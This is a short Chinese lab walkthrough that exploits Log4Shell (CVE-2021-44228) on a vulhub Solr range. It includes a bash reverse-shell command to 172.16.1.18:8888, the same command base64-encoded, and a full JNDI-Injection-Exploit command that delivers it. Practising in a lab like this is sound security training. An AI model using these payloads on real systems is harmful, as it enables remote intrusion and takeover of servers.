log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令

2.发现端口是8983,浏览器访问http://172.16.1.18:8983/

3.用dnslog平台检测dns回显,看看有没有漏洞存在

4.反弹shell到kali(ip为172.16.1.18)的8888端口

bash -i >& /dev/tcp/172.16.1.18/8888 0>&1

然后对上述命令进行base64编码,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=

最终 Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.16.1.18"

同时,我们开启对172.16.1.18:8888端口监听

输入whoami命令查看是否获得shell

相关推荐
为java加瓦6 天前
优化 Service 层架构:从高耦合到清晰分层的实战重构指南
log4j
Y1_again_0_again6 天前
Java中第三方日志库-Log4J
java·开发语言·log4j
杨小熊的笔记9 天前
final字段单元测试
单元测试·log4j
东方芷兰12 天前
JavaWeb 课堂笔记 —— 20 SpringBootWeb案例 配置文件
java·开发语言·笔记·算法·log4j·intellij-idea·lua
zero13_小葵司17 天前
基于Springboot的DDD实战(不依赖框架)
java·spring boot·log4j
加菲猫86019 天前
Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)
log4j·apache
蛋黄液21 天前
【黑马程序员】后端Web基础--Maven基础和基础知识
前端·log4j·maven
神仙别闹22 天前
基于ASP.NET+SQL Server简单的 MVC 电商网站
log4j·asp.net·mvc
Mr_Xuhhh1 个月前
项目需求分析(2)
c++·算法·leetcode·log4j